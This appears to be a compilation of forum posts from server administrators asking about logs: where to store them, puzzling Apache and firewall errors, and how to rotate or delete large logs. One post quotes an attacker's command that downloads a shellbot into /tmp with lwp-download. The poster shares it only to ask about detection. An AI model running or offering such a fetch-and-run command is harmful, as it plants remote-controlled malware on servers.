I have recently started a forum and am wondering where I should locate the error logs for such things as database backups and failed admin panel login attempts.
There is the public_html folder, but I'm concerned that Anything contained within this folder is accessible to prying eyes. Is this true?
I have also heard of directory traversal, which I imagine could fall under the same category.
Would I perhaps be best off creating a folder outside of public_html for the holding of these valuable 'targets'?
What would I best to do to secure my server in this regard? It would have to be writeable for the system to be operational.
since i take server i got a lot of errors on my apche logs when i post this command on my shell:-
Code: tail -f /usr/local/apache/logs/error_log will coming a lot & fast error and not stop until i stop the apache:-
Code: [Fri May 29 11:37:52 2009] [error] [client 77.167.228.165] File does not exist: /usr/local/apache/htdocs/40E80014354C4C30365047322020202020202020202020206C0000004D6600000001760000005CEB000530E1E8EEF4 [Fri May 29 11:37:52 2009] [error] [client 89.215.36.123] File does not exist: /usr/local/apache/htdocs/40E80014202020202020465032443031324B3842364842456C000000446600000001760000005CEB000530797F848A [Fri May 29 11:37:52 2009] [error] [client 93.185.179.132] File does not exist: /usr/local/apache/htdocs/40E800006C000001596600000001760000005CEB0005307587A8B4
every thing is ok but i need to remove this error and i can't under stand from where comming ! "/usr/local/apache/htdocs"
I am running Plesk on a VPS and a page on one of my websites won't load no matter what I try, I want to view the error logs but aren't sure how to go about it on this system...
I want to check error logs in hypervm in my friend vps , as I haven't done before, I want to know where can I view error logs
I have a doubt if there was an error in installation of kloxo, as I couldn't find an option to add ip address in kloxo or any other error which is troubling in adding an ip to kloxo
After a full year of operation, I think I need to delete some log files. What types of files can I safely delete (and is deletion the best option, i.e. will the files be regenerated from zero length?)
For example, my server's error_log file is 193 Mb and my access_log file is 14 Mb. Can I "rm" them both?
Are there any other such files I can safely delete that occupy space on the server?
I assume they are file requests made from ads on the site.
Right now I've just added those directories and files to appease the error logs, but can I fake their existence somehow without having to clutter up my file structure?
We have running a Plesk 12.0.18 update #47 on a CentOS 6.6 VPS.
Suddenly one of the domains hosted has stopped recording the error logs from apache so we can't troubleshoot the web issues. All other hosts are working right.
I just got an email from my vps saying that a BFD attack was stopped and the ip was banned after 40 failed attempts of logging into ftpdpro. I logged in and started looking around and I noticed that in my apf log file there was:
Code: Jan 15 00:54:07 s1 apf(22290): {glob} firewall initalized Jan 15 00:54:07 s1 apf(22290): {glob} fast load snapshot saved Jan 15 00:58:06 s1 apf(32425): {glob} uptime less than 5 minutes, going full load Jan 15 00:58:06 s1 apf(32425): {glob} activating firewall Jan 15 00:58:06 s1 apf(32500): {glob} unable to load iptables module (ip_tables), aborting. Jan 15 00:58:06 s1 apf(32425): {glob} firewall initalized Jan 15 00:58:06 s1 apf(32425): {glob} fast load snapshot saved Jan 15 01:00:04 s1 apf(3950): {glob} uptime less than 5 minutes, going full load My concern is that it says "unable to load iptables module (ip_tables), aborting.
is there anything that logs server load and what processes have caused any spikes?
one of my servers keeps going down under high load, well it seems to lock up and the noc has to reboot, but ofcourse the techs can't diagnose a problem after as it runs fine and when i send them a ticket it's because the server can't be reached at all and then they can't diagnose it either
I moved a domain of mine from one of my CentOS servers on my SoHo LAN, to one of my CentOS cPanel/WHM servers. Since the SoHo machine had been handling this domain's mail for almost 2 years (300+ mb of mail), I decided to continue running it from home.
The Apache daemon was stopped on said SoHo box following DNS propagation to the cPanel machine, but Apache was automatically started again after having to reboot the SoHo server. Before I got a chance to kill Apache, I got some weird entries showin' up in the access_logs.
I ask simply because I don't recall seeing a "CONNECT" entry in my logs before, and I've been at this for awhile. That or I've just not paid any attention. And what's with the SSL port?
I guess I'm just a little confused as to what was trying to be accomplished here...it hasn't returned since.
All the log is under a single file, occupying huge amount of space on our server use lxadmin for the vps
we are unable to even open up the file, as we have almost run out of space, we would atleast like to delete around old logs older than a month, this logs are from 3 months, so please help us in solving this problem
if we delete the sql log, will a new log be created automatically or it gives an error?
if redhat keeps a log of ip addresses which have logged into the server.
Ive got a machine that one of my staff logged into today with the root account, and im wondering if I can find out the ip address of the user who logged in as root?
Feb 22 04:58:31 la1092 kernel: ata2: command 0xc8 timeout, stat 0x50 host_stat 0x24 Feb 22 04:58:32 la1092 kernel: ata2: status=0x50 { DriveReady SeekComplete } Feb 22 04:58:32 la1092 kernel: Info fld=0x2d7e, Current sdb: sense key No Sense Feb 22 04:58:32 la1092 kernel: ata1: command 0xc8 timeout, stat 0x50 host_stat 0x24 Feb 22 04:58:32 la1092 kernel: ata1: status=0x50 { DriveReady SeekComplete } Feb 22 04:58:32 la1092 kernel: Info fld=0x4632f99, Current sda: sense key No Sense Feb 22 04:58:32 la1092 kernel: ata2: command 0xc8 timeout, stat 0x50 host_stat 0x24
Current setup is nginx, lighttpd and apache as web servers.
I keep receiving hacking attempts from someone accessing my server and running commands like these:
Code: hubberfix
sh -c cd /tmp;lwp-download [url] shellbot
I cannot find any logs with these attempts. Or at least any with info like an IP address or host doing this.
Not to sound like a noob, but where can I find logs that would tell me all the commands run on my system? FYI, I'm running Debian Sarge, and I looked in "/var/log" and I can't find much of anything.
- exim_mainlog starts at 03/18/2007 (not aware of any rotating log crons)
- grep info@someexternaldomain.com /var/log/exim_mainlog is empty, even after sending to that email from localdomain.com today, a few times
- localdomain.com is found fine in localdomains, trueuserdomains
- localdomain.com sent just fine to another local domain on server plus gmail account. Delivery receipt to both domains plus the info@someexternaldomain.com were "succesful"
I've received from info@someexternaldomain.com many times back and forth without issues, yet today nothing shows up in exim_mainlog NOR any other logs inside /var/log
I have Apache making seperate log files for each of my virtual hosts and putting them in /home/vhostname/log. Rotatelogs makes a new log every 24 hours, but the logs quickly add up and since the sites are fairly busy the logs are at times over a gb. Is there any way to make rotatelogs delete the log files after two days? Or should I just use newsyslog?
I just have a quick question for the experts here regarding the bin logs that MySQL generates. I have Googled around, tried to understand these logs, and from what I gather, it is a good idea to leave on if you want to do replication in case something happens, or if you have a slave or backup drive and you want to replicate to it.
So, these things seem like a good thing to have. My question is though, do they HAVE to stay there now? I unknowingly enabled these back in May on my CentOS server when I used and then tweaked the my-huge conf file, and there they are ever since. Currently they're sucking down 30GB of my hard disk and it's only 80GB.
It would be good if I could just take say, all the ones that haven't been modified for at least a month or so (there are 30 of them, most of them are stopped at 1GB I believe, that's how it splits them up.) Is moving those to another hard disk say, my 500GB one, an OK thing to do?
It won't affect my currently running MySQL data, right? And the bin logs will still be useful?
I'm sure this question has been asked before, but I'm looking for a nice and simply way of breaking up log files into smaller chunks.
I've been running apache2 on a VPS for the past few months and one of the access.log files is now 700mb big... bit of a waste of space. I'm currently just doing: